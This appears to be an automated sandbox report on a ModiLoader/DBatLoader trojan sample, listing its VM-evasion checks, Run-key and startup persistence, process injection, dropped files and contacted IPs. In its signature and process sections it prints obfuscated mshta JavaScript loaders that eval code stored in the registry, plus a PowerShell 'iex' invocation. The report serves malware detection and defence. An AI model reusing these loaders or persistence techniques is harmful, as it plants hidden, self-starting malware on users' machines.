Malware Analysis Report

2024-10-19 07:03

Sample ID 240509-nzh6daga5s
Target 29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118
SHA256 2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a

Threat Level: Known bad

The file 29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox drivers on disk

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Loads dropped DLL

Deletes itself

Checks computer location settings

Executes dropped EXE

Checks BIOS information in registry

Drops startup file

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 11:49

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 11:49

Reported

2024-05-09 11:52

Platform

win7-20231129-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\mshta.exe |

Checks for common network interception software

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A

Looks for VirtualBox Guest Additions in registry

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | C:\Windows\SysWOW64\regsvr32.exe | N/A

Looks for VirtualBox drivers on disk

evasion
Description | Indicator | Process | Target
File opened (read-only) | C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys | C:\Windows\SysWOW64\regsvr32.exe | N/A

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Looks for VMWare Tools registry key

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | C:\Windows\SysWOW64\regsvr32.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\regsvr32.exe | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk | C:\Windows\SysWOW64\regsvr32.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:F19YYw=\"C\";G7H1=new%20ActiveXObject(\"WScript.Shell\");VyhkG26=\"5WcZ\";eyk88S=G7H1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\hsgrudze\\\\zdxvakv\");rhJaE6dM=\"tIH\";eval(eyk88S);APEo98Kh=\"IVEXC\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Ehc1gFBK=\"w4dgf\";xX7=new%20ActiveXObject(\"WScript.Shell\");fnKe1L3=\"z2BA\";mO40ru=xX7.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");bZF69T=\"fE\";eval(mO40ru);l7F5EKr=\"JvC6qaj\";" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\416844\\eecdc5.lnk\"" | C:\Windows\SysWOW64\regsvr32.exe | N/A

Maps connected drives based on registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\International | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:gTqKu5k5B=\"VzJ\";Ub28=new ActiveXObject(\"WScript.Shell\");Bdpx30mf=\"0rQ5oz\";eg9ER=Ub28.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");iw67vO=\"Y45uv\";eval(eg9ER);XMquS9=\"N\";\"" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d | C:\Windows\SysWOW64\regsvr32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.983f33d\ = "81b494" | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494 | C:\Windows\SysWOW64\regsvr32.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\81b494\shell | C:\Windows\SysWOW64\regsvr32.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Events
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | N/A | 2
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 4
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A | 56

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Events
PID 1660 wrote to memory of 2864 | N/A | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | 12
PID 2864 wrote to memory of 1344 | N/A | C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | 4
PID 1344 wrote to memory of 2588 | N/A | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe | 12
PID 2644 wrote to memory of 2624 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 4
PID 2624 wrote to memory of 1080 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\regsvr32.exe | 8
PID 1080 wrote to memory of 1584 | N/A | C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe | 8

Processes

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:dxpSbwS8="e9kmcjI";I5q3=new%20ActiveXObject("WScript.Shell");lC3FPPa="9hx";ND42st=I5q3.RegRead("HKLM\\software\\Wow6432Node\\oWkmdT9U\\osp3ZocR");Fo9arfOV="9l";eval(ND42st);O1qCYBe="wTam";

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cbfo

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country | Destination | Domain | Proto
US | 48.169.141.22:8080 | | tcp
KR | 165.246.247.140:80 | | tcp
MA | 196.83.255.242:80 | | tcp
CH | 81.221.77.40:80 | | tcp
TH | 27.145.168.85:443 | | tcp
US | 12.44.176.128:80 | | tcp
RU | 188.32.166.42:8080 | | tcp
SE | 84.216.74.198:8080 | | tcp
MX | 189.243.201.44:80 | | tcp
ES | 147.96.228.185:80 | | tcp
DE | 85.16.22.120:80 | | tcp
FR | 213.223.111.203:80 | | tcp
US | 131.201.65.7:80 | | tcp
NL | 195.73.87.125:80 | | tcp
CA | 153.71.63.204:80 | | tcp
GB | 92.232.9.128:80 | | tcp
CA | 207.61.240.252:80 | | tcp
US | 17.9.45.48:80 | | tcp
US | 35.148.212.161:80 | | tcp
DK | 82.211.221.66:80 | | tcp
BR | 179.100.237.195:8080 | | tcp
CN | 113.6.94.140:8080 | | tcp
US | 32.31.93.37:80 | | tcp
NL | 217.12.208.12:80 | 217.12.208.12 | tcp
DE | 91.249.8.30:80 | | tcp
US | 69.48.11.103:80 | | tcp
US | 22.149.89.189:80 | | tcp
SG | 4.194.169.202:80 | | tcp
CN | 175.94.211.97:443 | | tcp
JP | 133.57.80.53:80 | | tcp
US | 170.6.4.5:80 | | tcp
CN | 218.16.30.202:80 | | tcp
JP | 165.242.208.184:8080 | | tcp
JP | 61.210.213.107:80 | | tcp
IT | 176.206.180.60:80 | | tcp
JP | 111.65.193.192:80 | | tcp
DE | 51.121.29.43:80 | | tcp
GB | 185.118.127.66:80 | | tcp
US | 11.30.52.195:80 | | tcp
ZM | 45.215.198.138:80 | | tcp
US | 168.175.213.159:80 | | tcp
GB | 158.230.210.36:80 | | tcp
US | 135.199.212.200:80 | | tcp
CO | 191.149.8.119:80 | | tcp
JP | 126.142.255.138:80 | | tcp
LU | 158.167.89.124:80 | | tcp
GB | 25.224.84.108:80 | | tcp
US | 34.68.185.174:80 | | tcp
US | 164.223.42.38:80 | | tcp
TW | 163.32.130.211:80 | | tcp
US | 184.185.80.116:80 | | tcp
GB | 62.136.34.227:80 | | tcp
US | 155.35.170.109:443 | | tcp
NL | 161.87.225.12:80 | | tcp
PL | 79.191.75.134:80 | | tcp
US | 29.154.141.94:443 | | tcp
US | 134.168.232.111:80 | | tcp
US | 17.2.236.95:80 | | tcp
US | 24.169.162.55:80 | | tcp
CA | 142.246.145.150:8080 | | tcp
US | 28.170.176.70:80 | | tcp
US | 54.235.104.236:80 | | tcp
US | 54.235.104.236:80 | 54.235.104.236 | tcp
IT | 88.46.87.124:80 | | tcp
RU | 31.130.85.46:80 | | tcp
NL | 145.132.137.210:80 | | tcp
RU | 80.242.59.198:80 | | tcp
NL | 217.12.208.12:80 | 217.12.208.12 | tcp
US | 4.153.91.67:80 | | tcp
US | 70.105.108.29:80 | | tcp
JP | 61.214.197.50:80 | | tcp
US | 28.225.25.44:80 | | tcp
DE | 217.11.58.97:80 | | tcp
US | 7.228.42.175:80 | | tcp
US | 135.177.180.132:80 | | tcp
US | 57.162.224.185:80 | | tcp
NO | 2.148.41.150:80 | | tcp
US | 138.193.231.200:80 | | tcp
NZ | 49.227.114.3:80 | | tcp
CO | 200.29.126.180:80 | | tcp
MY | 175.137.203.245:80 | | tcp
CN | 124.251.96.198:80 | | tcp
CH | 163.161.105.125:80 | | tcp
DE | 51.131.50.220:80 | | tcp
AU | 175.38.155.122:80 | | tcp
US | 192.18.37.3:80 | | tcp
US | 52.32.132.68:443 | | tcp
IT | 37.116.111.130:8080 | | tcp
US | 18.76.190.185:80 | | tcp
DE | 87.168.149.84:80 | | tcp
US | 216.204.230.229:80 | | tcp
CN | 110.208.188.5:80 | | tcp
US | 214.166.90.160:80 | | tcp
BR | 177.29.215.184:80 | | tcp
US | 47.196.215.79:80 | | tcp
FR | 109.223.53.181:80 | | tcp
US | 138.57.50.148:80 | | tcp
CN | 120.38.237.202:80 | | tcp
ZA | 146.230.212.38:80 | | tcp
AU | 165.18.121.151:80 | | tcp
CN | 218.80.98.247:80 | | tcp
JP | 126.242.64.136:80 | | tcp
US | 99.175.61.120:80 | | tcp
US | 107.64.9.230:80 | | tcp
RE | 109.122.163.93:80 | | tcp
US | 44.77.197.138:80 | | tcp
CN | 106.239.232.160:80 | | tcp
NO | 153.110.66.137:80 | | tcp
RU | 212.48.51.106:80 | | tcp
US | 75.66.50.106:80 | | tcp
NL | 217.12.208.12:80 | 217.12.208.12 | tcp
CN | 180.112.39.142:8080 | | tcp
US | 215.177.254.117:80 | | tcp
AR | 181.82.96.121:80 | | tcp
SE | 78.67.94.111:8080 | | tcp
US | 135.178.38.144:80 | | tcp
US | 26.149.214.191:80 | | tcp
US | 140.64.7.217:80 | | tcp
US | 140.197.125.242:80 | | tcp
US | 104.38.141.187:80 | | tcp
JP | 133.152.63.244:80 | | tcp
NL | 104.83.201.181:8080 | | tcp
GB | 51.9.117.104:80 | | tcp
CH | 195.65.23.181:80 | | tcp
US | 70.228.39.17:443 | | tcp
JP | 113.34.174.60:80 | | tcp
US | 7.64.209.103:80 | | tcp
NL | 81.206.39.168:80 | | tcp
US | 143.25.40.224:80 | | tcp
US | 17.148.108.113:80 | | tcp
US | 107.22.93.94:80 | | tcp
DE | 89.13.8.151:80 | | tcp
US | 171.143.222.192:80 | | tcp
US | 147.191.22.187:8080 | | tcp
US | 26.116.127.27:80 | | tcp
SG | 43.86.150.39:80 | | tcp
CN | 103.165.52.201:80 | | tcp
US | 139.56.191.199:80 | | tcp
KE | 196.102.62.48:80 | | tcp
TW | 140.135.2.226:80 | | tcp
US | 44.236.199.194:80 | | tcp
DE | 91.46.107.44:80 | | tcp
US | 33.242.153.162:80 | | tcp
US | 99.123.228.82:8080 | | tcp
US | 71.44.88.138:80 | | tcp
US | 50.178.213.159:8080 | | tcp
FR | 54.38.71.155:80 | | tcp
US | 76.253.221.145:8080 | | tcp
IT | 188.152.155.149:80 | | tcp
CA | 50.69.193.218:80 | | tcp
CO | 161.18.163.5:80 | | tcp

Files

memory/2864-2-0x0000000000400000-0x000000000043F000-memory.dmp

memory/2864-4-0x0000000000400000-0x000000000043F000-memory.dmp

\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

MD5 29d53275576b5ded03ed2a1e5dc1f0cf
SHA1 754da96a93a901bd9a2885b438b11989f020621b
SHA256 2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
SHA512 11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

memory/2864-14-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-16-0x0000000000400000-0x000000000043F000-memory.dmp

memory/2864-17-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-19-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-18-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-20-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-21-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-22-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2624-41-0x0000000006340000-0x0000000006416000-memory.dmp

memory/1080-42-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-44-0x0000000000200000-0x0000000000341000-memory.dmp

memory/2624-45-0x0000000006340000-0x0000000006416000-memory.dmp

memory/1080-51-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-52-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-50-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-54-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-56-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-57-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-53-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-46-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-59-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-47-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-48-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-84-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-49-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-67-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-68-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-77-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-76-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-75-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-74-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-73-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-85-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-66-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-65-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-62-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-64-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-63-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-61-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-60-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-58-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-55-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1584-98-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-99-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-97-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-95-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-100-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-96-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-94-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-93-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-92-0x0000000000110000-0x0000000000251000-memory.dmp

C:\Users\Admin\AppData\Local\416844\7efaba.bat

MD5 a9d3ea542d72c3d4eb6e79b37f9b265e
SHA1 9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9
SHA256 d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314
SHA512 eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d

MD5 aa37b7596ed13ac91b87344631bce5b8
SHA1 0f873444ac01f923e70f7bef5a9b0b302787cc9d
SHA256 eb216409d0231346cc0b05114e632d4f8a0dfb9857a455d4f85cdf2f8e2aa863
SHA512 c545701e2c938174a35bc423b6053618dc11f38929a262d714717c59d52bf0cb09179fe5fa36b44c43192aaf7eb071cc57ef60b4a4731ca7377b0a4932862022

C:\Users\Admin\AppData\Local\416844\eecdc5.lnk

MD5 dc7d7d400a2ef3f6bd26b5b59752dc65
SHA1 24024493823a5eddce9744e2c0d7a1c08883ad58
SHA256 ddda6e501616a1507124ac030f156ba4d2701400dba1f526034dc94dbd8fc16b
SHA512 f08cb194d3a8fc48e79e0f2ee0aa02902ebc08ded5531bf4656baa88b2bbba0e908a59dd830c1d625eeb542a30d7d199b83b22ca9d212ecf4d45cda4b1d0aab1

C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d

MD5 3725ca4cdcca4e5760a4322f0891770e
SHA1 5676e4505dca24e502e0ca19d0860e8ee5df32bd
SHA256 f012b4205cf478530338ef27db54196c52cc2773a66517382988e6bc651b2322
SHA512 a2370ffc00077fc890cdc41120fbc633eb321386b763b695e81bf89f364238104bd28dd47c441c9963b3123790f517fc8854b9bf87c554c59ae19ccafdb4eb30

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk

MD5 fecb855b47f9a96231ba51789b61f929
SHA1 44f9d8498b33569cac0a0a939c3dc636564cea06
SHA256 9a45685f97f6534d880ced46ede455e8ef78877ab1bbef76986335309eddd3c7
SHA512 94307f8bb949464855a8a7088a4f3f1d70232006f2dc57f85567963a9253056b589de203fb5244ef8de53a8122dcdcc61c5533b7ec85b33805b9339cebd09bff

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 11:49

Reported

2024-05-09 11:52

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

